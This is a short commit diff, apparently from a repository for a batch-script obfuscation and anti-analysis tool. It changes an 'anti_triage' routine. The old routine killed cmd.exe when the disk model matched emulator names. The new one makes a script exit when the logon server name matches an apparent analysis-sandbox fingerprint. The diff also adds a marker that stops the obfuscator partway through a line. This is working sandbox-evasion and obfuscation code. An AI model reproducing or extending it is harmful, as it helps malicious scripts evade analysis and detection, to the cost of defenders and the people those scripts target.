update

KDot227 · Dec 15, 2024 · d29b706 · d29b706
1 parent e0ab0b4
commit d29b706
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 1 deletion.
diff --git a/src/util/methods/anti_methods/anti_changes.py b/src/util/methods/anti_methods/anti_changes.py
@@ -63,7 +63,7 @@ def vm_test():
     @staticmethod
     def anti_triage():
         code = [
-            '''powershell "$KDOT = wmic diskdrive get model;if ($KDOT -like '*ADY HARDDISK*' -or $KDOT -like '*EMU HARDDISK*') { taskkill /f /im cmd.exe }"''',
+            """echo %LOGONSERVER% | findstr /i "DADDYSERVER" >nul && exit""",
         ]
         return random.choice(code)
 

diff --git a/src/util/obfuscation/obfuscate.py b/src/util/obfuscation/obfuscate.py
@@ -186,8 +186,20 @@ def obfuscate(self, file):
                     continue
 
                 else:
+                    global_stop_obf = False
                     for word in line.split():
                         # check if any of self.used_env_vars are in the line
+                        if global_stop_obf:
+                            log.debug("Global stop obf True")
+                            f.write(word + " ")
+                            continue
+
+                        if word == "%STOP_OBF_HERE%":
+                            global_stop_obf = True
+                            log.debug("Stop obf True")
+                            f.write(word + " ")
+                            continue
+
                         if re.search(escape_regex, word):
                             log.debug("escape True")
                             f.write(word + " ")